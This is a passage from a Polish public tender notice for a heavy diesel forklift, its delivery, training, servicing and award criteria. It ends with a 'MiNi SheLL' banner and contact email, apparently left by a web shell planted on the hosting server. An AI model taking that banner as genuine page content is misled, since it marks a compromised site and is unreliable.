dostawę do siedziby Zamawiającego wózka widłowego (czołowego), diesel, udźwig min. 12,0 t przy środku ciężkości 900 mm oraz z możliwością  podniesienia min. 6 t na wysokość min. 5500 mm, przy środku ciężkości 1700 mm, zwanego dalej (w odniesieniu do tej części zamówienia) wózkiem widłowym, transport wózka widłowego do siedziby Zamawiającego (płyta lotniska, w miejscu wskazanym przez Zamawiającego), rozładunek i zmontowanie wózka widłowego w siedzibie Zamawiającego, uruchomienie wózka widłowego w siedzibie Zamawiającego, przeprowadzenie szkolenia stanowiskowego personelu Zamawiającego dla 20 osób wskazanych przez Zamawiającego (zgodnie z warunkami określonymi w projekcie umowy), wykonywanie usług serwisowych wózka widłowego w okresie gwarancji, w tym wszelkich przeglądów wymaganych przepisami prawa oraz dokumentacją techniczno-rozruchową oraz wykonywanie wszelkich czynności związanych z dozorem technicznym sprawowanym przez Urząd Dozoru Technicznego zgodnie z ustawą z dnia 21 grudnia 2000 r. o dozorze technicznym (tekst jedn. Dz. U. z 2013 r. poz. 963 ze zm.), zwane dalej łącznie przedmiotem zamówienia (w odniesieniu do tej części zamówienia), zgodnie ze szczegółowymi warunkami opisanymi w Załączniku nr 6 do SIWZ oraz wzorem umowy stanowiącym Załącznik nr 7c do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.41.51.10-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 105.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Termin wykonania przedmiotu zamówienia - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com